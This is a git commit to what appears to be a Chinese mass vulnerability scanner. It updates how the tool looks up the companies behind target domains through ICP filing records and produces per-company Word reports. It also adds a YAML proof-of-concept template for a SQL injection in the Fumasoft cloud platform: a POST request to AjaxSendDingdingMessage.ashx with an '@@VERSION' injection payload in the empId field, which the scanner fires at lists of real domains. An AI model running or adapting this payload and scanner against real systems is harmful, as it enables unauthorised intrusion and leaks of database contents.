更新备案API

This commit is contained in:
MasonLiu 2024-10-11 17:54:44 +08:00
parent 6c96f50806
commit 3bfb52d5dc
2 changed files with 76 additions and 24 deletions

View File

@ -7,6 +7,7 @@ import urllib.parse
import sys import sys
import docx import docx
import os import os
import re
import warnings import warnings
import requests import requests
import argparse import argparse
@ -48,11 +49,15 @@ def get_company_name(url):
soup = BeautifulSoup(response.content, 'html.parser') soup = BeautifulSoup(response.content, 'html.parser')
# 查找公司名称的<a>标签 # 查找公司名称的<a>标签
company_name_tag = soup.find('a', id='companyName') company_name_tag = soup.find('div', {'tag': 'company_name'})
# 提取公司名称 # 提取公司名称
if company_name_tag: if company_name_tag:
return company_name_tag.text text = company_name_tag.text
cleaned_text = re.sub(r'[^\w\s]', '', text) # 去除英文符号
cleaned_text = re.sub(r'\s+', ' ', cleaned_text).strip() # 去除多余空格和换行符
return cleaned_text
# return company_name_tag.text
else: else:
print("公司名称未找到") print("公司名称未找到")
return None return None
@ -100,9 +105,9 @@ def create_document():
def extract_root_domain(url): def extract_root_domain(url):
extracted = tldextract.extract(url) extracted = tldextract.extract(url)
root_domain = f"{extracted.domain}.{extracted.suffix}" root_domain = f"{extracted.domain}.{extracted.suffix}"
encoded_bytes = base64.b64encode(root_domain.encode('utf-8')) # encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
encoded_str = encoded_bytes.decode('utf-8') # encoded_str = encoded_bytes.decode('utf-8')
return urllib.parse.quote(encoded_str) return urllib.parse.quote(root_domain)
def add_scan_results_to_document(document, domain, results, include_all, description, choice_3): def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
for name, result, status_code, url, res_time in results: for name, result, status_code, url, res_time in results:
@ -117,7 +122,8 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
if result == "存在漏洞" and choice_3 == "y": if result == "存在漏洞" and choice_3 == "y":
screenshot_path_1 = screenshot(url) screenshot_path_1 = screenshot(url)
# print(screenshot_path_1) # print(screenshot_path_1)
screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain)) # 站长工具反爬,该截图已废弃
# screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
# print(screenshot_path_2) # print(screenshot_path_2)
#word处理部分 #word处理部分
#导入模板 #导入模板
@ -136,24 +142,25 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
run = paragraph.add_run() run = paragraph.add_run()
if screenshot_path_1: if screenshot_path_1:
run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片 run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片
run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加图片 # run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加ICP备案图片已废弃寻找新方法
doc_save_path = './file/result/' doc_save_path = './file/result/'
if not os.path.exists(doc_save_path): if not os.path.exists(doc_save_path):
os.mkdir(doc_save_path) os.mkdir(doc_save_path)
#保存word根据需要自行更改 #保存word根据需要自行更改
company_name = get_company_name("https://icp.chinaz.com/" + domain) company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
doc_name = str(company_name) + "_" + name + ".docx" doc_name = str(company_name) + "_" + name + ".docx"
doc.save(doc_save_path + doc_name) doc.save(doc_save_path + doc_name)
def mass_poc_scan(domains, include_all, choice_2, docx_name): def mass_poc_scan(domains, include_all, choice_2, docx_name, status):
document = create_document() document = create_document()
try: try:
for domain in domains: for domain in domains:
logging.info(f"正在扫描域名:{domain}") logging.info(f"正在扫描域名:{domain}")
if status == 'y':
if not check_url_status(domain): if not check_url_status(domain):
logging.warning(f"访问失败,跳过当前域名的扫描:{domain}") logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
print("--------------------------------------------------") print("--------------------------------------------------")
if choice_2.lower() == 'n': if choice_2.lower() == 'y':
document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3 document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
continue continue
@ -163,6 +170,14 @@ def mass_poc_scan(domains, include_all, choice_2, docx_name):
except Exception as e: except Exception as e:
logging.error(f"扫描域名 {domain} 时出错:{e}") logging.error(f"扫描域名 {domain} 时出错:{e}")
print("--------------------------------------------------") print("--------------------------------------------------")
else:
try:
results, description = validate_main(domain)
add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
except Exception as e:
logging.error(f"扫描域名 {domain} 时出错:{e}")
print("--------------------------------------------------")
except KeyboardInterrupt: except KeyboardInterrupt:
print(Fore.RED +'\n检测到Ctrl+C中断程序。' + Fore.RESET) print(Fore.RED +'\n检测到Ctrl+C中断程序。' + Fore.RESET)
save_document(document, docx_name) save_document(document, docx_name)
@ -191,6 +206,7 @@ if __name__ == "__main__":
file_path = "./urls.txt" file_path = "./urls.txt"
include_all = False include_all = False
choice_3 = 'y' choice_3 = 'y'
status = 'y'
else: else:
# 交互模式 # 交互模式
choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower() choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower()
@ -203,6 +219,8 @@ if __name__ == "__main__":
print("--------------------------------------------------") print("--------------------------------------------------")
domains = extract_domains_from_file(file_path) domains = extract_domains_from_file(file_path)
status = input(Fore.BLUE + "请问是否需要检查目标网站存活状态?(y/n): " + Fore.RESET).lower()
print("--------------------------------------------------")
choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower() choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower()
include_all = choice_2 != 'y' include_all = choice_2 != 'y'
print("--------------------------------------------------") print("--------------------------------------------------")
@ -212,9 +230,13 @@ if __name__ == "__main__":
# 执行扫描 # 执行扫描
domains = extract_domains_from_file(file_path) domains = extract_domains_from_file(file_path)
if args.batch: if args.batch:
mass_poc_scan(domains, include_all, choice_3, args.name) mass_poc_scan(domains, include_all, choice_3, args.name, status)
else: else:
docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤)" + Fore.RESET) docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤)" + Fore.RESET)
print("--------------------------------------------------") print("--------------------------------------------------")
mass_poc_scan(domains, include_all, choice_3, docx_name) mass_poc_scan(domains, include_all, choice_3, docx_name, status)
# if __name__ == "__main__":
# domain = 'http://vr.sh-fit.com:9090'
# company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
# print(company_name)

View File

@ -0,0 +1,30 @@
keyword: fumasoft
name: 孚盟云平台存在SQL注入漏洞
description: | # 下一行可填写漏洞描述
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。
requests: # 为空代表默认或者不启用
path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx"
method: POST
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
body-raw: |- # 如果需要发送请求体,在下一行开始填写
action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "Copyright" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞可能导致数据库敏感信息泄露。